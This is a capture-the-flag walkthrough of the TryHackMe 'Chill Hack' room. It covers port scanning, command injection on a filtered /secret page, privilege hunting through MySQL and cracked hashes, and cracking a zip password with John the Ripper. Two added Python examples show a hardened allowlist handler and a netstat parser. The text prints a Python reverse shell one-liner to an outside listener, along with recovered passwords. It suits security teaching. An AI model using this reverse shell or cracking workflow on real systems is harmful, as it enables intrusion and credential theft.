Chill Hack
mkdir ~/Documents/TryHackMe/eJPT/ChillHack
cd ~/Documents/TryHackMe/eJPT/ChillHack
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.44.40
export URL=http://$IP
First, let's scan the machine for open ports. I usually do this with nmap.
You need to run this command as root.
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
This will take a while, so I use rustscan to make a quick scan.
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
Before accessing the website I like to see what I can find on the FTP server. And I found something interesting: two possible users, Anurodh and Apaar.
Now let's enumerate the website using feroxbuster and dirsearch.
After this I found an interesting directory, /secret.
Here we can inject commands, but it looks like the application has some filter.
After trying a lot of reverse shells I found one that works.
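The /secret page is a command-execution form guarded by a filter, which is exactly the pattern a denylist cannot protect. As an added example (not code from the room or the author, and written in Python rather than the room's PHP), here is the fragile denylist approach next to a hardened handler that validates the input against a strict allowlist (an IP address or a DNS hostname) and passes it to the subprocess as a separate argv element with no shell involved. The ping use case and the function names are assumptions for illustration.

```python
import ipaddress
import re
import subprocess

# Fragile approach: block a few shell metacharacters and hope nothing else
# reaches the shell. Kept only for contrast; string concatenation plus
# shell=True is the bug, and the denylist can never enumerate every way
# a shell will interpret untrusted text.
DENYLIST = (";", "&", "|")


def denylist_allows(user_input: str) -> bool:
    """Return True if the weak filter would let the input through."""
    return not any(bad in user_input for bad in DENYLIST)


class InvalidTarget(ValueError):
    """Raised when the user input is not an IP address or a DNS hostname."""


# RFC 1123 style hostname: labels of [a-z0-9-], no leading/trailing hyphen.
# A leading hyphen is also what would turn the value into a ping option,
# so rejecting it here doubles as argument-injection protection.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def validate_target(user_input: str) -> str:
    """Allowlist validation: accept only a literal IP or a hostname."""
    value = user_input.strip()
    try:
        # ipaddress rejects anything that is not a well-formed IPv4/IPv6 literal
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value.lower()
    raise InvalidTarget(f"not an IP address or hostname: {user_input!r}")


def build_ping_argv(user_input: str) -> list:
    """Build the command as an argv list; the target is one argument, never shell text."""
    return ["ping", "-c", "1", "-W", "2", validate_target(user_input)]


def run_ping(user_input: str) -> int:
    """Hardened handler: validated argument, shell=False, bounded runtime."""
    argv = build_ping_argv(user_input)
    completed = subprocess.run(argv, shell=False, capture_output=True, timeout=10)
    return completed.returncode


if __name__ == "__main__":
    for candidate in ("10.10.44.40", "example.com", "127.0.0.1; ls", "-n"):
        try:
            print(candidate, "->", build_ping_argv(candidate))
        except InvalidTarget as exc:
            print(candidate, "-> rejected:", exc)
```

The point of the allowlist is that the handler never has to reason about which characters are dangerous: anything that is not a host is refused, and because the value travels as a single argv element, even a hostname containing unusual characters could not reach a shell parser.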
export RHOST="10.8.113.25";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
Now let's get some info about the server, using the netstat command to see the connections on this machine. Port 9001 is mine and 53 is DNS, so 3306 remains to investigate. Port 3306 is the default port for MySQL.
www-data@ubuntu:/var/www/files$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.44.40:68 0.0.0.0:* -
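The useful reading of this listing is which services are bound to every interface and which are reachable only from the box itself: 3306 is loopback-only, which is why it never showed up in the nmap scan from outside. As an added example (not code from the room or the author), this script parses the netstat -tulpn output shown above, embedded here as sample input, and classifies each listener; the Listener class and function names are my own.

```python
import re
from dataclasses import dataclass

# Sample input: the netstat -tulpn listing from the walkthrough above.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.44.40:68 0.0.0.0:* -
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    address: str
    port: int
    program: str  # "-" when netstat was not run as root, as in the listing


# proto, recv-q, send-q, local addr:port, foreign addr, optional LISTEN (TCP only), program
LINE_RE = re.compile(
    r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(?:LISTEN\s+)?(\S+)$"
)


def parse_netstat(text: str) -> list:
    """Parse netstat -tulpn output; header and notice lines are skipped."""
    listeners = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            proto, address, port, program = match.groups()
            listeners.append(Listener(proto, address, int(port), program))
    return listeners


def classify(listener: Listener) -> str:
    """all-interfaces: reachable from the network; loopback: local only."""
    if listener.address in ("0.0.0.0", "::"):
        return "all-interfaces"
    if listener.address.startswith("127.") or listener.address == "::1":
        return "loopback"
    return "single-interface"


def ports_by_class(listeners: list, wanted: str) -> list:
    return sorted({l.port for l in listeners if classify(l) == wanted})


def exposed_ports(listeners: list) -> list:
    return ports_by_class(listeners, "all-interfaces")


def loopback_ports(listeners: list) -> list:
    return ports_by_class(listeners, "loopback")


if __name__ == "__main__":
    found = parse_netstat(NETSTAT_OUTPUT)
    print("exposed:", exposed_ports(found))
    print("loopback only:", loopback_ports(found))
    print("single interface:", ports_by_class(found, "single-interface"))
```

Run against the listing above it reports 21, 22 and 80 as exposed and 53, 3306 and 9001 as loopback-only, with 68 (the DHCP client) bound to the machine's own address. Anything in the loopback set is a service an attacker can only reach after landing on the host, which is also why such a service deserves the same credential hygiene as an exposed one.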
In /var/www/files/index.php I found something interesting. I assume these are the credentials for the SQL database.
www-data@ubuntu:/var/www/files$ mysql -h localhost -P 3306 -u root -p
Enter password: !@m+her00+@db
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)
Let's crack these hashes and get the passwords for apaar and anurodh.
anurodh:masterpassword
apaar:dontaskdonttell
After some tries it seems that these are not the credentials for SSH, so let's enumerate to see what we can find.
I found in the home directory of apaar a file that can be read by www-data. And if you check what www-data can execute (sudo -l) you'll see that this file can be executed.
I came across an intriguing file in the /var/www/files/images folder, prompting me to set up a simple HTTP server using Python to download it. Upon further investigation, I identified a file named backup.zip.
It seems that I need a password to unzip that file, so I use john to crack that password.
$ zip2john backup.zip > hash
$ john hash -w=~/Documents/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2023-12-03 11:18) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I have obtained a PHP file named source_code.php, in which I discovered credentials associated with the username 'anurodh'.
echo 'IWQwbnRLbjB3bVlwQHNzdzByZA=='| base64 -d
After some enumeration I found the answer.